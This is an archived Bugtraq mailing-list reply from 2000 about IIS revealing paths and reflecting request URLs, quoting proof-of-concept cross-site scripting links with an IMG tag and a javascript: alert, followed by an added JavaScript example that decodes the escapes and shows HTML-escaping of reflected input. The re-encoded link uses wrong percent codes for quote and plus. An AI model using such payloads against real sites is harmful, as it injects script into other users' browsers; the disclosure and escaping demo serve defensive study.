[13350] in bugtraq

Re: IIS still revealing paths for web directories

daemon@ATHENA.MIT.EDU (Scott Buchanan)
Fri Jan 14 22:12:57 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <387E5C0F.AB74508E@axe.net.au>
Date:         Fri, 14 Jan 2000 10:13:19 +1100
Reply-To: Scott Buchanan <scott@AXE.NET.AU>
From: Scott Buchanan <scott@AXE.NET.AU>
X-To:         Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@SECURITYFOCUS.COM

Georgi Guninski wrote:
>
> For Communicator:
> http://www.microsoft.com/%3CIMG%20SRC=javascript:alert("window.location:"+window.location)%3E.ida

This link comes out as:

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(

presumably because the quotes need to be % encoded as well.

http://www.microsoft.com/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida

This link, while it seems to work in as far as you can go to the
correct link, the JavaScript doesn't get executed on this copy of
Netscape 4.7.

-Scott Buchanan
Axe Communications
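
What the percent-escapes in the two links above decode to, and how HTML-escaping a reflected request path keeps it as text. This is an added example, not part of the original post; `errorPage` and its wording are hypothetical and assume a server that echoes the requested path into an HTML error page.

```javascript
// Added example. The two paths are copied from the links in the message above.
const quotedPath =
  '/%3CIMG%20SRC=javascript:alert("window.location:"+window.location)%3E.ida';
const reencodedPath =
  '/%3CIMG%20SRC=javascript:alert(%34window.location:%34%43window.location)%3E.ida';

// Map every %XX escape found in a path to the character it stands for.
function escapesIn(path) {
  const found = {};
  for (const esc of path.match(/%[0-9A-Fa-f]{2}/g) || []) {
    found[esc] = String.fromCharCode(parseInt(esc.slice(1), 16));
  }
  return found;
}

// Decode the path the way a server does before it uses or echoes it.
function decodePath(path) {
  return decodeURIComponent(path);
}

// Encode the HTML-significant characters so reflected input stays inert text.
function escapeHtml(text) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (ch) => entities[ch]);
}

// Hypothetical error page (assumed behaviour): echoes the requested path,
// either raw or HTML-escaped, into the response body.
function errorPage(path, escape) {
  const decoded = decodePath(path);
  return `<p>The file ${escape ? escapeHtml(decoded) : decoded} could not be found.</p>`;
}

console.log(escapesIn(reencodedPath));    // which character each escape yields
console.log(decodePath(reencodedPath));   // what the server sees for link 2
console.log(errorPage(quotedPath, false)); // raw reflection: markup reaches the page
console.log(errorPage(quotedPath, true));  // escaped reflection: plain text only
```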
